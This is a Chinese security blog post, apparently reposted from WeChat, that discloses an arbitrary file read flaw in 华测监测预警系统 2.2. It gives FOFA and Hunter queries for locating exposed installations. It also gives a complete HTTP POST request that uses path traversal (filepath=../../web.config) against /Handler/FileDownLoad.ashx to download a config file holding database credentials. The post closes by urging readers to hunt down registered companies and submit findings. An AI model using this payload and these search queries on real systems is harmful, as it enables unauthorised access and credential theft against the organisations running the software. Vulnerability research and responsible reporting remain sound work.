华测监测预警系统 2.2 | 任意文件读取漏洞

admin 2024年2月23日09:31:53评论31 views字数 618阅读2分3秒阅读模式

前言

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

华测监测预警系统 2.2 | 任意文件读取漏洞

1. 资产搜集

直接上fofa 和 hunter
个人推荐hunter可以看到icp备案公司直接提交盒子就行了

FOFA语法 app=”华测监测预警系统2.2”

Hunter语法 web.body=”华测监测预警系统2.2”

华测监测预警系统 2.2 | 任意文件读取漏洞

2. 漏洞复现

这里手动复现的,目录是/Handler/FileDownLoad.ashx
通过hackerbar 可以修改POST传参,或者利用BP构造请求包。

  1. POST /Handler/FileDownLoad.ashx HTTP/1.1

  2. Host: ip:port

  3. User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)

  4. Accept-Encoding: gzip, deflate

  5. Accept:*/*

  6. Connection: close

  7. Content-Type: application/x-www-form-urlencoded

  8. Content-Length: 36

  9. filename=1&filepath=../../web.config

这里的filename随便传参,只是一个文件名字。
filepath是文件路径,这里访问后会直接下载文件到本地。

华测监测预警系统 2.2 | 任意文件读取漏洞

文件里包含了数据库的账号密码

3. 实战总结

最后直接用hunter找到有备案信息的公司,直接提交 盒子成功!!!
华测监测预警系统 2.2 | 任意文件读取漏洞


原文始发于微信公众号(渗透安全团队):华测监测预警系统 2.2 | 任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日09:31:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   华测监测预警系统 2.2 | 任意文件读取漏洞https://cn-sec.com/archives/2115590.html

发表评论

匿名网友 填写信息